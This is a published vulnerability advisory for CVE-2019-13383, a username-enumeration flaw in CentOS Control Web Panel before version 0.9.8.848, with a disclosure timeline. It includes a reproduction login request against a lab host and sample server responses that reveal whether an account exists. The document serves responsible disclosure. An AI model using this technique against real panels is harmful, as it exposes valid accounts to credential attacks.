Share
# Exploit Title: CWP (CentOS Control Web Panel) < 0.9.8.848 User Enumeration via HTTP Response Message  
# Date: 15 July 2019  
# Exploit Author: Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak  
# Vendor Homepage: https://control-webpanel.com/changelog  
# Software Link: Not available, user panel only available for lastest version  
# Version: 0.9.8.836 to 0.9.8.847  
# Tested on: CentOS 7.6.1810 (Core)  
# CVE : CVE-2019-13383  
  
# ====================================================================  
# Information  
# ====================================================================  
  
Product : CWP Control Web Panel  
version : 0.9.8.838  
Fixed on : 0.9.8.848  
Test on : CentOS 7.6.1810 (Core)  
Reference : https://control-webpanel.com/  
CVE-Number : 2019-13383  
  
  
  
# ====================================================================  
# Root course of the vulnerability  
# ====================================================================  
The server response different message between login with valid and invalid user.  
This allows attackers to check whether a username is valid by reading the HTTP response.  
  
  
  
# ====================================================================  
# Steps to Reproduce  
# ====================================================================  
  
1. Login with a random user by using invalid password  
  
POST /login/index.php?acc=validate HTTP/1.1  
Host: 192.168.80.137:2083  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
csrftoken: d41d8cd98f00b204e9800998ecf8427e  
X-Requested-With: XMLHttpRequest  
Content-Length: 30  
Connection: close  
Referer: https://192.168.80.137:2083/login/?acc=logon  
  
username=AAA&password=c2Rmc2Rm  
  
  
  
2. Check the HTTP response body  
  
2.1 User does not exist (server response suspended)  
  
HTTP/1.1 200 OK  
Server: cwpsrv  
Date: Mon, 15 Jul 2019 01:39:06 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
X-Powered-By: PHP/7.0.32  
Content-Length: 9  
  
suspended  
  
  
2.2 User does exist (server response nothing)  
  
HTTP/1.1 200 OK  
Server: cwpsrv  
Date: Mon, 15 Jul 2019 01:40:12 GMT  
Content-Type: text/html; charset=UTF-8  
Connection: close  
X-Powered-By: PHP/7.0.32  
Content-Length: 0  
  
  
  
3. HTTP response body format depends on software version, but all of them keep responding differently as the example below  
  
------------------------------------------------------------  
| Username | Password | Result |  
  
------------------------------------------------------------  
| valid | valid | login success |  
  
| valid | invalid | {"error":"failed"} |  
  
| invalid | invalid | {"error":"user_invalid"} |  
------------------------------------------------------------  
  
  
  
# ====================================================================  
# PoC  
# ====================================================================  
https://github.com/i3umi3iei3ii/CentOS-Control-Web-Panel-CVE/blob/master/CVE-2019-13383.md  
  
  
  
# ====================================================================  
# Timeline  
# ====================================================================  
2019-07-06: Discovered the bug  
2019-07-06: Reported to vendor  
2019-07-06: Vender accepted the vulnerability  
2019-07-11: The vulnerability has been fixed  
2019-07-15: Published  
  
  
  
# ====================================================================  
# Discovered by  
# ====================================================================  
Pongtorn Angsuchotmetee  
Nissana Sirijirakal  
Narin Boonwasanarak